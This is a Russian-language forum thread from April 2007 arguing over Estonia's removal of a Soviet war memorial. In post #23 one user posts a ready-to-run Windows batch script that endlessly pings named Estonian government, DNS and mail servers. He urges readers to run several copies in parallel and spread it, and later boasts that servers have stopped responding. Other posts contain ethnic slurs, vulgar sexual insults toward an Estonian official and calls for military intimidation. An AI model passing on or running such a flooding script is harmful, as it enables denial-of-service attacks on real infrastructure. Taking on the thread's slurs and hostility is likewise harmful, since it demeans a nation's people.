Перейти к содержимому

Здравствуйте, гость ( Вход | Регистрация )



  • Авторизуйтесь для ответа в теме
Эстония Сообщений в теме: 73

#21
Отправлено 29 Апрель 2007 - 08:37

kev

    Президент

  • Пользователи
  • PipPipPipPipPipPipPip
  • 5 799 сообщений

меня интересует вопрос, сколько еще наших граждан должно погибнуть, чтобы наш президент что-нибудь сделал

А что, много граждан погибло?

Блин, любая нормальная страна бы уже войска ко границе Эстонии придвинула.

Это какая страна? И зачем ей это делать?

#22
Отправлено 29 Апрель 2007 - 11:09

Тов. Барсов

    Аспирант

  • Пользователи
  • PipPipPip
  • 599 сообщений
  • Район:где-то здесь, рядом

А зачем? Кому нужны военные потери, если можно давить гораздо более эффективно, правомерно и без последствий для нас самих?

Я что-то говорил о нападении на Эстонию?:-) Как только наши танки будут на границе, нападать уже будет поздно - Эстония сама склонится на колени и не только.

Это какая страна? И зачем ей это делать?

Ну, хотя бы страна Америка, с Ираном и Ираком. Или страна Советский Союз с Афганистаном. Или страна Англия с имперским Севастополем. Любая.

#23
Отправлено 29 Апрель 2007 - 11:15

Maks

    Аспирант

  • Пользователи
  • PipPipPip
  • 578 сообщений
  • Район:Москва, Казанский вокзал
Ты не согласен с политикой эстонии ??? Ты думаешь, что ты лично не влияешь на ситуацию ??? Ты МОЖЕШЬ повлиять на это в Интернете ! Для простоты написан маленький скрипт, который в бесконечном цикле пингует эстонские сервера. Сначала сделай файл .bat и запусти. Желательно 4-6 параллельно. Сайт правительства эстонии уже не работает. Кто следующий? Решать тебе!!! Отомстим за издевательства эстонского правительства!!! Разошли это сообщение по всему контакт-листу, вставь в ЖЖ, запости на форумах. Пусть эстония знает, что Россия своих не бросает! На 9ое МАЯ планируется повтор данной акции! Не дай унизить своих соотечественников, отомсти за издевательства !!! Вот BAT файл, который последовательно пингует эстонские DNS и MAIL сервера. Цикл бесконечен  Скопировать нижеприведённый текст, вставить в блокнот и сохранить как privetestonia.BAT (название можно любое) файл @echo off SET PING_COUNT=50 SET PING_TOMEOUT=1000 :PING echo Pinguem estonskie servera ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% dns.estpak.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.126.115.18 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.eenet.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.56.245 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.kbfi.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.133.222 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.online.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.106.96.21 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.uninet.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.0.1 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.ut.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.5.99 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.uu.net ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 137.39.1.3 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% sunic.sunet.se ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 192.36.125.2 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% muheleja.eenet.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.0.132 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns2.eenet.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.0.12 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% kbfi.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.58.129 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% smtp.uninet.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.0.4 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ptah.kbfi.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 194.204.58.129 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.gov.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 195.80.106.241 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns.aso.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 195.80.96.222 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% ns2.ut.ee ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% 193.40.5.76 ping -w %PING_TOMEOUT% -l 1000 -n %PING_COUNT% mail.gov.ee GOTO PING

#24
Отправлено 29 Апрель 2007 - 11:32

kev

    Президент

  • Пользователи
  • PipPipPipPipPipPipPip
  • 5 799 сообщений

Я что-то говорил о нападении на Эстонию?:-) Как только наши танки будут на границе, нападать уже будет поздно - Эстония сама склонится на колени и не только.

Хахаха!
И еще Марина Кальюранд побежит делать минет всему правительству РФ.

Ну, хотя бы страна Америка, с Ираном и Ираком. Или страна Советский Союз с Афганистаном. Или страна Англия с имперским Севастополем. Любая.

За имперский Севастополь не скажу - у меня двойка по истории, но другие примеры впечатляют. Прямо так и вижу, как американские войска располагаются у границ Ирака, а всеми любимый Саддам тут же "сам склоняется на колени и не только". В реальности все по другому было или мне кажется?
Не говоря уже о том, что Ближний Восток - это далеко не Евросоюз.

#25
Отправлено 29 Апрель 2007 - 11:51

Тов. Барсов

    Аспирант

  • Пользователи
  • PipPipPip
  • 599 сообщений
  • Район:где-то здесь, рядом

Хахаха!
И еще Марина Кальюранд побежит делать минет всему правительству РФ.

Учитывая, что Эстония - страна-[censored], то так и будет:)

За имперский Севастополь не скажу - у меня двойка по истории, но другие примеры впечатляют. Прямо так и вижу, как американские войска располагаются у границ Ирака, а всеми любимый Саддам тут же "сам склоняется на колени и не только". В реальности все по другому было или мне кажется?
Не говоря уже о том, что Ближний Восток - это далеко не Евросоюз.

Эти примеры с предыдущей фразой не связаны. Это примеры того, как сильное государство решает свои проблемы войсками, причем сразу, без раздумий - и добивается того, чего ему надо.

#26
Отправлено 29 Апрель 2007 - 12:02

kev

    Президент

  • Пользователи
  • PipPipPipPipPipPipPip
  • 5 799 сообщений

Учитывая, что Эстония - страна-блядь, то так и будет:)

Это только в твоих юношеских фантазиях.

Эти примеры с предыдущей фразой не связаны. Это примеры того, как сильное государство решает свои проблемы войсками, причем сразу, без раздумий - и добивается того, чего ему надо.

Не связаны? Значит, это прямой намек на то, что Россия - ненормальная и слабая страна.
Насчет "решает и добивается" хорошо сказано, с восхищением. Хотя мне кажется, что американский контингент в Ираке твоих восторгов не разделяет. Афганистан, кстати, тоже веселая тема.

#27
Отправлено 29 Апрель 2007 - 12:11

Dirt of Lash

    Проректор

  • Пользователи
  • PipPipPipPipPip
  • 2 149 сообщений
  • Район:Город

А что, много граждан погибло?

По официальным данным один точно и еще один - хз, по неофициальным - больше.

Вообще - тут дело не в том, сколько погибло.

Представим, что есть некий европейский памятник на территории Россиии и русские скины договарившись с правительством его бы снесли.
Сразу был бы пронзительный визг в прессе "ФОШЫЗМ!!!! РОЗРУШАЮЩИЙ ПАМЕТНЕКИ ЯВРОПЕЙСКИМ ГИРОЯМ!!!", потом экономические санкции и.т.д.
А если бы там кто нибудь погиб... Его бы тут же обьявили общеевропейским героем и т.д. и т.п.
А наши умники жвачку жуют, как водится.

Почему наше правительство так лениво на это реагирует я понять не могу.

#28
Отправлено 29 Апрель 2007 - 12:13

Тов. Барсов

    Аспирант

  • Пользователи
  • PipPipPip
  • 599 сообщений
  • Район:где-то здесь, рядом

Это только в твоих юношеских фантазиях.

То есть, это не Эстония - одна из стран, которая всегда с тем, кто сильнее и у кого ракеты длиннее?:)

Не связаны? Значит, это прямой намек на то, что Россия - ненормальная и слабая страна.

А что, сильная? Если мы даже Эстонии и Грузии, экономики которых зависят от нас, ничего сделать не можем.

Насчет "решает и добивается" хорошо сказано, с восхищением. Хотя мне кажется, что американский контингент в Ираке твоих восторгов не разделяет. Афганистан, кстати, тоже веселая тема.

Про Афганистан потом напишу. Контингет в Ираке свою задачу (контроль нефтепроводов) выполнил - а в каких количествах он гибнет, неважно. Всяко медленнее, чем те же американцы в авариях и по пьяни.

#29
Отправлено 29 Апрель 2007 - 12:13

dark

    Проректор

  • Пользователи
  • PipPipPipPipPip
  • 2 208 сообщений

Хотя мне кажется, что американский контингент в Ираке твоих восторгов не разделяет. Афганистан, кстати, тоже веселая тема.


А кого волнует контингент который не разделяет восторга? Я вполне уверен что американское правительство ОЧЕНЬ радо итогам афганистанской и иракской компании, нефть принадлежит им, а это и было целью. А уж с недовольными разберутся.

#30
Отправлено 29 Апрель 2007 - 13:56

STiNG

    Профессор

  • Пользователи
  • PipPipPipPip
  • 1 158 сообщений
По поводу всех этих "давайте заспамим и запингуем" вспоминается анекдот: Пошли муравьи на войну, оставили одного сторожить муравейник. Возвращаются, а муравейник растоптан. Спрашивают с охранника: - Как же так, че случилось? - Да медведь пришел и всё растоптал... Но я ему отомстил! - Как? - Прямо посреди берлоги насрал! В общем, как слону дробина. Наивное дурачьё - оно и в интернете дурачьём остаётся.

#31
Отправлено 29 Апрель 2007 - 13:58

kev

    Президент

  • Пользователи
  • PipPipPipPipPipPipPip
  • 5 799 сообщений

Представим, что есть некий европейский памятник на территории Россиии и русские скины договарившись с правительством его бы снесли.
Сразу был бы пронзительный визг в прессе "ФОШЫЗМ!!!! РОЗРУШАЮЩИЙ ПАМЕТНЕКИ ЯВРОПЕЙСКИМ ГИРОЯМ!!!", потом экономические санкции и.т.д.
А если бы там кто нибудь погиб... Его бы тут же обьявили общеевропейским героем и т.д. и т.п.
А наши умники жвачку жуют, как водится.

Вот когда договорятся и снесут, тогда будет видно. А так это просто треп.

То есть, это не Эстония - одна из стран, которая всегда с тем, кто сильнее и у кого ракеты длиннее?:)

А причем здесь это? Евросоюз вполне силен, и ракеты у него есть. Поэтому Эстония с ними и на колени перед нами становиться не собирается. И не встанет, даже если какой-нибудь дятел прикажет выдвинуть к ее границе российские танки.

А что, сильная? Если мы даже Эстонии и Грузии, экономики которых зависят от нас, ничего сделать не можем.

Страна как страна, бывает и существенно хуже.
А вот про зависимость экономик других стран от нашей я бы послушал.

Контингет в Ираке свою задачу (контроль нефтепроводов) выполнил - а в каких количествах он гибнет, неважно. Всяко медленнее, чем те же американцы в авариях и по пьяни.

Думаю, российский контингент в Эстонии задачу сохранения памятника выполнит. А сколько там солдат погибнет и чем это обернется на мировой арене совершенно неважно, правда?

#32
Отправлено 29 Апрель 2007 - 15:20

Maks

    Аспирант

  • Пользователи
  • PipPipPip
  • 578 сообщений
  • Район:Москва, Казанский вокзал
Сплошной флуд - если бы да кабы... Про пинг - некоторые сервера уже не отвечают, так что анекдоты здесь не уместны. Надо учитывать масштаб рассылки таких тем по рунету. Про спам - уже вчера эти ящики не работали и присылали отбойник.

#33
Отправлено 29 Апрель 2007 - 15:29

Хлеб Нарезной

    Профессор

  • Пользователи
  • PipPipPipPip
  • 1 799 сообщений
  • Район:Красно-белое Ясенево
обуевшая маленькая страна просто слов нет.

#34
Отправлено 29 Апрель 2007 - 15:48

STiNG

    Профессор

  • Пользователи
  • PipPipPipPip
  • 1 158 сообщений

Про пинг - некоторые сервера уже не отвечают, так что анекдоты здесь не уместны. Надо учитывать масштаб рассылки таких тем по рунету.
Про спам - уже вчера эти ящики не работали и присылали отбойник.

Я не пойму, эстонская экономика от работы серверов зависит что ли? Или может быть на почтовых ящиках держится? Не смешите.

#35
Отправлено 29 Апрель 2007 - 18:56

Женя-фин

    Профессор

  • Пользователи
  • PipPipPipPip
  • 1 063 сообщений
  • Район:ЮВАО
про памятник: ИМХО что было то прошло. Ветеранов почти не осталось. Ну снесли памятник и что? (причем его даже не снесли - ПРОСТО перенесли) Не надо ровняться на прошлое. Если эстонцы считают, что нужно снести - почему нет? Что за имперские амбиции? зачем России навязывать себя и свои комплексы относительно победы. Единственная претензия: жесткие действия эстонкого спецназа. Эстония - уже не часть СССР, а отдельное государство. PS/ можете писать мне, что хотите, мое мнение не изменится.

#36
Отправлено 29 Апрель 2007 - 19:08

Хлеб Нарезной

    Профессор

  • Пользователи
  • PipPipPipPip
  • 1 799 сообщений
  • Район:Красно-белое Ясенево
полностью не согласен с женей. я понимаю что они что хотят то и делают но это сделано специально чтобы что то доказать. тем более я думаю стоит уважать того кто тебя спас. и ваще истонцы нацисты и ну их нах.ваще фтопку не нужны они на этой земле. чета пукают невнятное, чета все хатят а ниче толком не получается. вон только что по телеку сказали что 8 мая он уже будет стоять где то там у них в другом месте. а все пи*дили что его распилили. как шелковые поставят и никуда он не денеца. радует одно. памятниг истонскому солдату облили и подожгли)))

#37
Отправлено 29 Апрель 2007 - 21:01

kev

    Президент

  • Пользователи
  • PipPipPipPipPipPipPip
  • 5 799 сообщений

можете писать мне, что хотите, мое мнение не изменится.

Хорошая мысль. Перефразируя одного персонажа, напишу: "поздравляю, Женя, ты - балбес!".
Если бы ты внимательно ознакомился с темой, на которую высказываешь свое ИМХО, то знал бы, что речь идет не только о памятнике, но и о захоронении. А если точнее, о костях советских солдат, которые собираются выкопать с целью то ли перезахоронить хрен знает где, то ли выбросить.
Ну а фраза "комплексы относительно победы" - это вообще угар. Если не секрет, какие комплексы развиваются от победы?

#38
Отправлено 29 Апрель 2007 - 22:37

Тов. Барсов

    Аспирант

  • Пользователи
  • PipPipPip
  • 599 сообщений
  • Район:где-то здесь, рядом

А причем здесь это? Евросоюз вполне силен, и ракеты у него есть. Поэтому Эстония с ними и на колени перед нами становиться не собирается.

Ну а я, блин, о чем? Эстония - страна-блядь, она сейчас с Евросоюзом, потому что он сильнее. Были сильнее мы, была Эстония с нами.

И не встанет, даже если какой-нибудь дятел прикажет выдвинуть к ее границе российские танки.

А тут уже столкновение желаемого и действительного. Как бы Эстонии не хотелось, чтобы сильный Евросоюз ее поддержал, с Россией из-за этой шавки ссориться никто не будет. Посему, почуяв танки у границы и дулю в словах союзников, Эстония будет вынуждена признать, что неправа, и сделать то, что нужно нам.

Страна как страна, бывает и существенно хуже.

Повод для радости? Мне смешно, когда представитель страны, некогда второй в мире, а по многим показателям - и первой, радуется тому, что есть еще страны хуже России.

А вот про зависимость экономик других стран от нашей я бы послушал.

А чего тут слушать? Ты знаешь, откуда Эстония берет свет, тепло и газ по льготным ценам? Угу. Если обрезать, Евросоюз далеко не за пару лет снова востановит этот огрызок.

Думаю, российский контингент в Эстонии задачу сохранения памятника выполнит. А сколько там солдат погибнет и чем это обернется на мировой арене совершенно неважно, правда?

Речь идет не только о памятнике. Во-первых - престиж державы. Маленькая страна не должна нам ничего диктовать. Во-вторых, ты знаешь, что в Эстонии идет дискриминация русских? Которых там 40 (вроде, поправьте, если что) процентов? Что нас выселяют из квартир ради счастья коренных эсто-онцев, травят в судах и настраивают против нас население? 40% русских - этого мало, чтобы действовать? Ты помнишь, что Израиль за одного своего солдата сделал?

#39
Отправлено 29 Апрель 2007 - 23:11

Ёжич

    Аспирант

  • Пользователи
  • PipPipPip
  • 379 сообщений
  • Район:галактика n43km2

Для простоты написан маленький скрипт, который в бесконечном цикле пингует эстонские сервера.

вообще-то, насколько я знаю, DDoS атаки караются по закону... но в такой распределенной всех не отловить
Да и чего можно достигнуть такой акцией?? Экономической блокады что ли??
ИМХО все действия типа спама нецензурными сообщениями и DDos атак нисколько не помогут в такой ситуации, а, наоборот, поспособствуют формированию в мире отрицательного мнения об российском интернет-сообществе.
Действительно "разрулить" ситуацию могут лишь решительные действия со стороны наших властей, которые 99,99% не последуют.
Интересно, как долго сможет продержаться Эстония  эстония на своих горючих сланцах  и кильке в случае нормальной экономической блокады...

#40
Отправлено 29 Апрель 2007 - 23:17

S.O.D.

    Профессор

  • Пользователи
  • PipPipPipPip
  • 1 826 сообщений
Ничего личного,только бизнес(как в одной песне поется) никакая блокада нашему бизнесу не нужна....




Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных